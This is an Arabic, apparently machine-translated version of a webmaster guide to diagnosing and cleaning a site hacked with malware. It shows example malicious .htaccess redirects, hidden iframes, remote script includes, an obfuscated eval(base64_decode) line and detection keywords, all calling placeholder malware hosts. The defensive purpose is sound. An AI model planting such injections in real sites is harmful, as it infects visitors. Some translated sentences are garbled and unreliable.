تم الاختراق باستخدام البرامج الضارة

البرامج الضارة هي أي تطبيق للأجهزة الجوّالة أو برنامج تم تصميمه خصيصًا لإلحاق الضرر أو جهاز كمبيوتر أو جهاز جوّال أو برنامج يشغّله أو مستخدميه. لمزيد من المعلومات حول ماهية البرامج الضارة، يمكنك الاطّلاع على البرامج الضارة والبرامج غير المرغوب فيها.

إذا كان موقعك الإلكتروني يحتوي على برامج ضارة، سيظهر التحذير عادةً للمستخدمين. يتم عرض رسالة "قد يضر هذا الموقع الإلكتروني بجهاز الكمبيوتر" التي يتم عرضها في نتائج البحث أو على الصفحة البينية التي يعرضها المتصفح عندما يحاول المستخدم زيارة موقع الويب، شيء من هذا القبيل:

الصفحة البينية للبرامج الضارة النموذجية
نتائج بحث تتضمن تحذيرًا من البرامج الضارة:

ستحتاج إلى ما يلي:

  • إمكانية وصول مشرف واجهة أوامر النظامية أو الوحدة الطرفية إلى خوادم موقعك: الويب، قاعدة البيانات، والملفات.
  • معرفة بأوامر واجهة المستخدم أو الوحدة الطرفية
  • يشير ذلك المصطلح إلى القدرة على تنفيذ استعلامات SQL على قاعدة البيانات.

الإعداد

  • الاشتراك في Search Console وإثبات ملكية الموقع الإلكتروني الذي تم اختراقه كما هو موضّح هنا توفر خدمة Search Console عيّنة من الصفحات المتأثرة، ما يساعد في تسهيل العثور على إصلاح مشكلات الاختراق باستخدام البرامج الضارة بسهولة أكبر. بالإضافة إلى ذلك، سيتم تحذيرك عندما يتم اكتشاف تأثر موقعك بالعديد من أنواع البرامج الضارة أو عمليات الاختراق الأخرى.

  • عرض صفحة تشخيص التصفح الآمن من Google للاطّلاع على معلومات عامة حول ما إذا كان الموقع الإلكتروني قد يتسبّب بضرر للمستخدمين. يمكنك الاطّلاع على حالة البيانات لصفحتك أو موقعك الإلكتروني على عنوان URL مشابه لما يلي: https://transparencyreport.google.com/safe-browsing/search?url=***<<page_or_site>>*** مثال: https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com

    يمكن أن يكون <<page_or_site>> عنوان URL محدّدًا لصفحة (http://example.com/badpage) أو موقعك بالكامل (example.com).

  • تجنَّب استخدام متصفّح لعرض الصفحات على موقعك الإلكتروني. لأن البرامج الضارة غالبًا تنتشر عن طريق استغلال الثغرات الأمنية في المتصفح وفتح برنامج فيروس في المتصفح إلى الإضرار بجهاز الكمبيوتر. ما لم يتم اتّباع تعليمات التشخيص يمكنك طلب الوصول إلى الصفحة في المتصفّح مباشرةً، أو استخدام cURL أو Wget لتنفيذ طلبات HTTP (لجلب صفحة على سبيل المثال).

    هذه الأدوات المتاحة مجانًا مفيدة في تشخيص عمليات إعادة التوجيه، ولديها المرونة في تضمين معلومات المُحيل أو وكيل المستخدم. بما في ذلك المُحيل أو وكيل المستخدم المحدد في محاكاة المخترقين، نظرًا فقد يعرض المخترقون محتوى ضارًا فقط للمستخدمين من خلال وكيل المستخدم أو المُحيل لاستهداف المزيد من "الأشخاص الحقيقيين" وتجنب الرصد من مالكي المواقع الإلكترونية وأدوات فحص البرامج الضارة.

`curl -v --referer "http://www.google.com" <your-url>`

في ما يلي مثال يحدّد كلاً من وكيل المستخدم والمُحيل:

`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`

ننصحك بجلب صفحة سواء كانت تشتمل على --referer "https://www.google.com"، لأنّ بعض البرامج الضارة نشطة فقط عندما يأتي المستخدمون من نتائج بحث Google.

  • أنشئ مستندًا لتسجيل ما يتم التوصل إليه في هذه الخطوة. ستظهر الوثيقة تضمين (كحد أدنى) اسم وموقع كل ملف تالف وملاحظات حول كيفية إصابتها، وستكون بمثابة أساس تنظيف موقعك وصيانته:

  • شاهد الفيديو السابق على هذه الصفحة للاطلاع على كيفية عمل البرامج الضارة والطريقة التي يمكنك بها الحفاظ على سلامتك أثناء التحقق من البرامج الضارة.

التشخيص

حدِّد البرامج الضارة التي تؤثر في موقعك الإلكتروني:

  1. افتح تقرير "مشاكل الأمان". لموقعك الإلكتروني في Search Console وسِّع وصف التحذير من البرامج الضارة للاطّلاع على قائمة بأمثلة الصفحات المتأثرة. يُرجى العِلم أنّ هذه القائمة ليست شاملة. قد لا تحصل على أمثلة صفحات جميع أنواع البرامج الضارة على موقعك.
  2. اختبِر نماذج الصفحات بحثًا عن الأنواع التالية من البرامج الضارة.

برامج ضارة لإعداد الخادم (عمليات إعادة توجيه غير مرغوب فيها)

لنفترض أن هناك متطفلًا قد اخترق موقعك ويعيد توجيه الزائرين من إلى موقع هجوم البرامج الضارة الخاص به، على الأرجح من خلال تعديل إعدادات ملفات التهيئة. عادةً ما تسمح ملفات إعداد الخادم للموقع الإلكتروني المشرف على تحديد عمليات إعادة توجيه عناوين URL لصفحات أو أدلة معينة على موقعك الإلكتروني. على سبيل المثال، في خوادم Apache، يكون هذا هو الملف .htaccess وhttpd.conf.

التشخيص

انتقِل إلى بعض عناوين URL المُعطاة كأمثلة في تقرير "مشاكل الأمان". ردّ من صفحة مصابة بـ "إعدادات الخادم" العدوى قد تشمل العناوين التالية:

&lt; HTTP/1.1 301 Moved Permanently
&lt; Date: Sun, 24 Feb 2013 21:06:45 GMT
&lt; Server: Apache
&lt; Location: http://&lt;<strong>_malware-attack-site_</strong>&gt;/index.html
&lt; Content-Length: 253

تحديد الملفات المتأثرة

سجِّل الدخول إلى خادمك من خلال الوصول إلى واجهة الأوامر أو الوحدة الطرفية (يمكن أن يكون الموقع الإلكتروني بلا اتصال بالإنترنت). إذا كنت تريد ذلك) وراجِع ملفات إعداد الخادم ذات الصلة. قد يكون هناك المزيد أكثر من ملف إعداد خادم تم اختراقه على موقعك الإلكتروني. التحقق من هذه الملفات توجيهات غير مرغوب فيها، مثل عمليات إعادة التوجيه إلى مواقع إلكترونية غير معروفة على سبيل المثال، في العنصر .htaccess، قد تظهر لك عملية إعادة توجيه على النحو التالي:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://&lt;<em><strong>_malware-site_</strong></em>&gt;/index.html** [R=301]

إدخال عبر SQL

اخترق أحد المتطفلين قاعدة بيانات موقعك الإلكتروني. على سبيل المثال، قد يعرف المخترق أدرجا شفرة ضارة برمجيًا في كل سجل بقاعدة البيانات بحيث عندما يقوم الخادم بتحميل صفحة تتطلب معلومات من فسيتم الآن تضمين الرمز الضار في محتوى الصفحة إلحاق الضرر بزائري الموقع.

التشخيص

  1. نفِّذ بعض طلبات البحث على عناوين URL المتأثرة في سطر الأوامر، وافحص الاستجابة لكلمات هجوم SQL مثل "iframe" أو "eval".

  2. سجِّل الدخول إلى خادم قاعدة البيانات أو اعرض قاعدة البيانات من خلال أداة مثل phpMyAdmin. في حال حذف استخدمت Wget أو cURL، فحاول ربط الضرر الذي تم العثور عليه في مصدر الصفحة من خلال Wget أو cURL بإدخالات قاعدة البيانات الفعلية. على سبيل المثال، إذا ولاحظت أن صفحاتك تتضمن إطار iframe خطيرًا، فيمكنك تنفيذ إجراء SQL الاستعلام عن رمز iframe. على سبيل المثال:

    SELECT * FROM blog_posts WHERE post_text LIKE '%&gt;iframe%';

  3. قد ترغب أيضًا في التحقق من سجل قاعدة البيانات وملفات الأخطاء على الخادم بحثًا عن نشاط غير معتاد، مثل أوامر SQL غير المتوقعة التي تبدو غير عادية المستخدمين العاديين أو الأخطاء.

حلّ المشكلة

تحديث كل سجل قاعدة بيانات مصابة أو استعادة آخر قاعدة بيانات معروفة النسخ الاحتياطي.

إدخال الرمز

تم تعديل الصفحات على موقعك الإلكتروني لتتضمن رمزًا ضارًا، مثل iframe، موقع هجوم البرامج الضارة.

التشخيص

انتقِل إلى بعض نماذج عناوين URL المعروضة في تقرير "مشاكل الأمان" باستخدام رمز cURL أو ويمكنك الحصول عليه وفحصه بحثًا عن أي رمز مريب. ويمكن أن يتخذ الرمز الذي يتم إدخاله عدة أنواع، كما يمكن أن يكون من الصعب العثور عليها. قد يكون من المفيد البحث عن كلمات مثل "iframe". للعثور على رمز iframe. وهناك كلمات رئيسية أخرى مفيدة هي "script" و"eval" و"unescape". بالنسبة مثلاً، للبحث في جميع الملفات عن "iframe" على الأنظمة التي تعمل بـ Unix:

$grep -irn "iframe" ./ | less</pre>

في ما يلي بعض الأنماط الشائعة للبرامج الضارة التي يمكن البحث عنها.

إطار iframe يحمِّل موقعًا ضارًا:

&lt;iframe frameborder="0" height="0" src="http://&lt;<strong><em>_malware-site_</em></strong>&gt;/path/file"
  style="display:none" width="0"&gt;&lt;/iframe&gt;

جافا سكريبت أو لغة برمجة نصية أخرى تستدعي نصوصًا برمجية وتشغلها من موقع الهجوم:

&lt;script type='text/javascript' src='http://&lt;<em><strong>_malware-site_</strong></em>&gt;/js/x55.js'&gt;&lt;/script&gt;

نص برمجي يعيد توجيه المتصفح إلى موقع هجوم:

&lt;script&gt;
  if (document.referrer.match(/google\.com/)) {
    window.location("http://&lt;<em><strong>_malware-site_</strong></em>&gt;/");
  }
&lt;/script&gt;

رمز ضار تم إخفاؤه لمنع رصده:

eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

ملفات عناصر مشتركة تم تصميمها لكتابة رموز ضارّة عشوائيًا وجعلها غير خطيرة النصوص البرمجية:

#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c

نماذج الأخطاء الضارة

يتم ضبط النموذج المستخدَم لرسائل الخطأ، مثل "404 لم يتم العثور على الملف". لنشر البرامج الضارة. وبهذه الطريقة، يمكن للمهاجمين شن هجمات على عناوين URL التي غير موجودة حتى على موقعك.

التشخيص

اطلب صفحة غير موجودة على موقعك، أو التي تعرض نوعًا آخر من وافحص الاستجابة لمعرفة ما إذا كانت تأتي من موقع آخر أو يحتوي على برامج ضارة بخلاف ذلك.

حلّ المشكلة

سجِّل الدخول إلى خادم الويب وابحث في ملفات إعداد الخادم عن الخطأ. توجيهات الصفحات. على سبيل المثال، يمكن استخدام نموذج الخطأ لخوادم ويب Apache التي تم تعريفها في ملف .htaccess. إليك مثال على إدخال ملف .htaccess تسترد صفحات الخطأ 404 من موقع ضار:

ErrorDocument 404 http://&lt;<span class="red-text"><em><strong>_malware-site_</strong></em></span>&gt;/index.html

عندما تكون مستعدًا لإزالة البرامج غير المرغوب فيها من موقعك الإلكتروني، استبدِل الملفات التي يبلغ عددها .htaccess. بنسخة احتياطية جيدة معروفة، أو حذف توجيهات errorDocument غير المرغوب فيها في الملفات الحالية .htaccess. تأكد أيضًا من تنظيف ملفات الخطأ الفعلية إذا إذا كانت متوفّرة على موقعك الإلكتروني وأخيرًا، أعِد تشغيل خادم الويب للتأكد من أن جميع تدخل التغييرات حيز التنفيذ.

الموارد التي يتم تحميلها من موقع إلكتروني مُختَرق أو ضار {compromised-resources}

يستخدم موقعك الإلكتروني محتوى أو موارد من موقع إلكتروني معروف أنه يحتوي على المحتوى الضار. قد تكون هذه الملفات عبارة عن ملفات JavaScript أو صور أو ملفات أخرى. ولهذا السبب، سيتم وضع علامة على موقعك تشير إلى احتواء موقعك على برامج ضارة تم تحميلها من موقع موقعك.

التشخيص

انتقِل إلى بعض عناوين URL المُعطاة كأمثلة في تقرير "مشاكل الأمان".

حلّ المشكلة

  1. تأكَّد من المشكلة من خلال الانتقال إلى بعض نماذج عناوين URL المدرَجة في تقرير "مشاكل الأمان" في Search Console من المفترض أن يظهر لك تحذير بشأن المتصفِّح.
  2. سيخبرك تحذير المتصفح بنطاق المحتوى المشكوك فيه. عليك إزالة جميع الإشارات إلى الموقع الإلكتروني الذي تمّ الإبلاغ عنه في تحذير المتصفِّح. إذا تم تضمين المحتوى من موقع تم الإبلاغ عنه بدون علمك، المشكلة أكثر خطورة. أن موقعك قد تعرض للاختراق على الأرجح، مواصلة فحص موقعك بحثًا عن عمليات الاختراق والثغرات الأخرى.
  3. إذا تعمّدت تضمين محتوى من موقع موثوق به أصبح وضع علامة عليه وتريد إعادة تضمين المحتوى بعد البيانات التي تم الإبلاغ عنها، يمكنك مراقبة حالة الموقع الذي تم الإبلاغ عنه باستخدام صفحة بيانات تشخيص "التصفح الآمن من Google" لهذا الموقع الإلكتروني (http://www.google.com/safebrowsing/diagnostic?site=www.example.com){:.external}. فعادةً ما يقوم أصحاب المواقع الشرعية بتنظيف هذه المواقع بشكل سريع.

التحقيق الإضافي

بعد ذلك، تحقق من عدم وجود أي ملفات أو تغييرات ضارة إضافية على النظام. تشير رسالة الأشكال البيانية قد يكون المخترق قد عدّل الصفحات الحالية أو سجلات قاعدة البيانات، وتم إنشاؤها الصفحات الجديدة غير المرغوب فيها أو الدوال المكتوبة التي تعرض محتوى غير مرغوب فيه على الصفحات النظيفة أو "الأبواب الخلفية" التي تسمح للمخترِق بإعادة الدخول إلى موقعك الإلكتروني أو تعيد إدخال شفرة ضارة أزلتها.

وإذا كان موقعك متوفرًا على الإنترنت، ننصحك بقطع الاتصال بالإنترنت حتى يتم هذا التحقيق.

إذا كانت لديك نسخة احتياطية معروفة وجيدة من موقعك، حدد الملفات التي تم إنشاؤه أو تعديله منذ إنشاء النسخة الاحتياطية والتحقق منها. تعمل بنظام التشغيل Unix يمكنك استخدام أمر مثل ما يلي للبحث عن ملفات جديدة:

diff -qr <current-directory> <backup-directory>

على سبيل المثال:

diff -qr www/ backups/full-backup-20120124/

أيضًا:

md5sum <current-page> <backup-page>

على سبيل المثال:

md5sum www/page.html backups/full-backup-20120124/page.html

التحقّق من الخادم وإمكانية الوصول وسجلّات الأخطاء بحثًا عن أي نشاط مريب، مثل محاولات تسجيل الدخول الفاشلة وسجل الأوامر (خاصة كجذر) وإنشاء حسابات مستخدمين غير معروفة. اعلم أن المخترق ربما يكون غيّر هذه السجلات لأغراضها الخاصة. يتم عرض بعض الأمثلة في الفيديو تحديد الثغرة الأمنية.

التحقّق من ملفات الضبط لعمليات إعادة التوجيه ملفات التهيئة هي ويُسمّى عادةً .htaccess وhttpd.conf. غالبًا ما ينشئ الهاكر حالة عمليات إعادة التوجيه استنادًا إلى وكيل المستخدم أو الوقت من اليوم أو المُحيل. إذا كنت بحاجة إلى لتحديث ملفات التهيئة، فقد تحتاج إلى إعادة تشغيل الخادم ستدخل التغييرات حيز التنفيذ.

التحقّق من أذونات المجلدات والملفات المفرطة في التساهل: يعبث المخترقون الأذونات لأنه إذا ظلت الأذونات البسيطة غير مكتشفة بواسطة مالك الموقع، فسيكون بإمكان المخترق الدخول مجددًا إلى الموقع. الملفات التي يزيد حجمها عن يمكن أن تتسبب 644 (rw-r--r--) والمجلدات التي يزيد حجمها عن 755 (rwxr-xr-x) في الأمان. المشكلات. ولذلك تأكد من أن أية أذونات غير محكمة تمثل أهمية كبيرة. مشغَّلة الأنظمة التي تعمل بـ Unix، جرّب ما يلي:

find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;

و:

find <your-dir> -type f -not -perm 644 -exec ls -la {} \;

إذا كانت لديك قاعدة بيانات، فتحقق من السجلات واحدًا تلو الآخر، باستخدام أداة مثل phpMyAdmin.